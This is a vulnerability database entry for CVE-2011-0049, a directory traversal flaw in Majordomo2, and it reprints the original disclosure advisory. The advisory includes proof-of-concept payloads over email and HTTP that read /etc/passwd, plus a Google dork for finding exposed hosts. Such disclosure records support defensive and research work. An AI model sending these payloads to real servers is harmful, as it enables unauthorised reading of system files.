Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Majordomo2 - Directory Traversal (SMTP/HTTP)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 45 Views

Vulnerability in Majordomo2 allows directory traversal via SMTP/HTT

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Majordomo2 - Directory Traversal (SMTP/HTTP)
3 Feb 201100:00
zdt
Circl		CVE-2011-0049
3 Feb 201100:00
circl
CVE		CVE-2011-0049
4 Feb 201100:00
cve
Cvelist		CVE-2011-0049
4 Feb 201100:00
cvelist
d2		DSquare Exploit Pack: D2SEC_MAJORDOMO
4 Feb 201101:00
d2
Dsquare		Majordomo 2 File Disclosure
27 Apr 201200:00
dsquare
Exploit DB		Majordomo2 - 'SMTP/HTTP' Directory Traversal
3 Feb 201100:00
exploitdb
exploitpack		Majordomo2 - SMTPHTTP Directory Traversal
3 Feb 201100:00
exploitpack
Tenable Nessus		Majordomo 2 _list_file_get() Function Traversal Arbitrary File Access
16 Feb 201100:00
nessus
Metasploit		Majordomo2 _list_file_get() Directory Traversal
12 Mar 201116:38
metasploit
Rows per page

                                                Original Advisory: https://sitewat.ch/en/Advisory/View/1
Credit: Michael Brooks (https://sitewat.ch)
Vulnerability:  Directory Traversal
Software: Majordomo2
Identifier:CVE-2011-0049
Vendor: http://www.mj2.org/
Affected Build: 20110121 and prior
Google dork:inurl:mj_wwwusr

Special thanks to Dave Miller,  Reed Loden and the rest of the Mozilla
security team for handling the issue.

This vulnerability is exploitable via ALL of Majordomo2's interfaces.
*Including
e-mail*.  Send an email to majordomo's mail interface (for example:
[email protected]) with the body of the message as follows:
help ../../../../../../../../../../../../../etc/passwd

I'll give you one guess as to the contents of the response email ;).

PoC for HTTP:
http://localhost/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
9.5High risk
Vulners AI Score9.5
EPSS0.90582
majordomo2directory traversalcve-2011-0049vulnerabilitysmtphttpcgihttp interfaceemail interfacesecurity issueexploit
45